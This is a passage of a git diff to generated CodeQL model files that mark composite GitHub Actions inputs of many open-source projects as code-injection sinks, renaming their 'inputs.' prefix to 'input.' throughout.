newline at end of file + - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 80c91739684..6548880f59e 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file + - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 2121bb23710..5401d176051 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"] \ No newline at end of file + - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index f0acc305672..70cf81f1b78 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file + - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index f099314b16e..eccccba83fe 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"] \ No newline at end of file + - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index 971cd92e3cd..b7133aae304 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"] \ No newline at end of file + - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 42aba6b02dd..26d7b448269 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "input.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 71d71f6cb21..7600cd4bdde 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 60a29d3edf7..dd79b0845dd 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file + - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 84d174e5a05..71bdd001458 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file + - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 5cc3a3a7475..3b3262f93a9 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index cee842ae1c6..b30d898dcc1 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 535e832c1c3..979a9aca5c2 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index e1902fb488f..b180a319baa 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] - - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file + - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 2ede3df9864..fb5fa4d8e4e 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file + - ["scitools/iris", "*", "input.version", "code-injection", "generated"] + - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "input.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 1bea0aef935..cb9faef2bf6 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file + - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRepository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 4a8bae9d2a1..e7eb6b732ff 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file + - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index c63ed017ae1..a1b1a4b71e8 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 544fc4b9951..2463b4a1d16 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file + - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 2d3871a2231..87e88b2c13d 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file + - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 4f18723df38..c0789d6e424 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] - - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file + - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index a96d86c7b5c..f617b9d172d 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index ff1b101be4a..f30719d58d8 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file + - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index fb7bdd0950e..84d5c96e63b 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file + - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 9b263d03357..d76ab136ab9 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file + - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 5e6e66c4be4..9e75660d1b3 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file + - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index cf545a95592..1cc6e837b84 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file + - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 0484e903515..b2e283c6983 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 756a1a0371a..d08bdb5d6f4 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index ed954bf6f97..4532947bc48 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 47aebb45825..518a27d9afc 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 28935d7a98b..bb21bcda68d 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 2ba9ff355e2..5f81d9bd406 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file + - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 530cc68ca4b..f8fe2344d0a 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] - - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - 